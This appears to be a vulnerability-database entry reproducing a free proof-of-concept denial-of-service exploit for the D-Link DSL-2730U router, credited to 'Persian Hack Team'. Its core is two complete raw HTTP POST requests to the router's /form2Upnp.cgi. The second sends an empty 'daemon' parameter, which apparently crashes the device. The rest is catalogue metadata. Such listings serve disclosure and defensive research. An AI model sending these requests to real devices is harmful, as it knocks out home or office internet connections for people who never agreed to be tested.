ID
VAR-E-201702-0018
TITLE
DLink DSL-2730U - Denial of Service Vulnerability
Trust: 0.6
AFFECTED PRODUCTS
vendor: | dlink | model: | dsl-2730u | scope: | - | version: | - | Trust: 0.6 |
EXPLOIT
##############################################################
# Exploit Title: D-Link DSL-2730U - Denial of Service
# Date: 2016-02-26
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM ([email protected])
# Home : http://persian-team.ir/
# Tested on: Windows AND Linux
# Demo : @PersianHackTeam
##############################################################
POC :
daemon Parameter Vulnerable
POST /form2Upnp.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.1/upnp.htm
Cookie: sessionid=13df8bc9; Language=en; SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
daemon=1&ext_if=pppoe+1&submit.htm%3Fupnp.htm=Send
Request :
Post Empty daemon Parameter
POST /form2Upnp.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.1/upnp.htm
Cookie: sessionid=13df8bc9; Language=en; SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
daemon= &ext_if=pppoe+1&submit.htm%3Fupnp.htm=Send
##############################################################
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian white hat Hackers
##############################################################
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service Vulnerability
Trust: 0.6
EXTERNAL IDS
db: | 0DAYTODAY | id: | 27132 | Trust: 0.6 |
db: | EDBNET | id: | 91297 | Trust: 0.6 |
REFERENCES
url: | https://0day.today/exploits/27132 | Trust: 0.6 |
SOURCES
db: | EDBNET | id: | 91297 |
LAST UPDATE DATE
2022-07-27T09:44:48.689000+00:00
SOURCES RELEASE DATE
db: | EDBNET | id: | 91297 | date: | 2017-02-26T00:00:00 |